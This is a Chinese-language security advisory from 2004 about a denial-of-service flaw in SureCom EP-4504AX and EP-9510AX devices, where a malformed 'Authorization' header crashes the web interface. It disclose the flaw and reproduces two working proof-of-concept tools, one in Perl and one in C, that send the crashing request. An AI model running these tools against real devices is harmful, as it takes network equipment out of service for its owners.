发布日期：2004-03-02
更新日期：2004-03-11

受影响系统：

Surecom EP-4504AX
Surecom EP-9510AX

描述：

---

BUGTRAQ  ID: 9795

SureCom是无线接入设备开放商。

SureCom包含的多种网络设备在处理畸形WEB请求时存在问题，远程攻击者可以利用这个漏洞使设备停止对正常服务的响应。

SureCom通常包含WEB接口进行管理，由于对用户提交的包含畸形"Authorization"参数数据的WEB请求缺少正确处理，可造成设备崩溃，停止对正常服务的响应。

<*来源：Vasco Costa
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Vasco Costa 提供了如下测试方法：

Authorization: B 00000000

#!/usr/bin/perl


use IO::Socket;


# default settings

$server = "192.168.0.1";
$port = "80";
$http_request = "GET / HTTP/1.1\r\nAuthorization: B 00000000\r\n\r\n";

if(@ARGV == 2) {

        $server = $ARGV[0];
        $port = $ARGV[1];

}
else {

        print "Usage: ./surecom_tester [address] [port]\n\n";
        print "Using default settings...\n\n";

}

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$server,
PeerPort=>$port)
  or die "ERROR: can't connect to $server on port $port\n\n";
print $socket $http_request;
$http_response = <$socket>;
print "The server's not vulnerable and replied with " . $http_response .
"\n";

------------------------------------------------------------------------

shaun2k2 <shaunige@yahoo.co.uk>提供了如下测试方法：

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
        if(argc < 3) {
                printf("SureCom Network Device
DoS,\n");
                printf("by shaun2k2 -
shaunige@yahoo.co.uk\n\n");
                printf("Usage: %s <host> <port>\n",
argv[0]);
                exit(-1);
        }

        int sock;
        struct hostent *he;
        struct sockaddr_in dest;

        if((he = gethostbyname(argv[1])) == NULL) {
                herror("gethostbyname()");
                exit(-1);
        }


        printf("SureCom Network Device DoS,\n");
        printf("by shaun2k2 -
shaunige@yahoo.co.uk\n\n");

        printf("[+] Crafting exploit buffer...\n\n");
        char explbuf[] = "GET /
HTTP/1.1\r\nAuthorization: B 00000000\r\n\r\n";

        if((sock = socket(AF_INET, SOCK_STREAM, 0)) <
0) {
                perror("socket()");
                exit(-1);
        }

        dest.sin_family = AF_INET;
        dest.sin_port = htons(atoi(argv[2]));
        dest.sin_addr = *((struct in_addr
*)he->h_addr);

        printf("[+] Connecting...\n");
        if(connect(sock, (struct sockaddr *)&dest,
sizeof(struct sockaddr)) < 0) {
                perror("socket()");
                exit(-1);
        }

        printf("[+] Connected!\n\n");

        printf("[+] Sending malicious HTTP
request...\n");
        send(sock, explbuf, strlen(explbuf), 0);
        sleep(2);
        close(sock);

        printf("[+] Done!\n");

        return(0);
}

建议：

---

厂商补丁：

Surecom
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www[dot]surecom[dot]com[dot]tw

浏览次数：3181
严重程度：0（网友投票）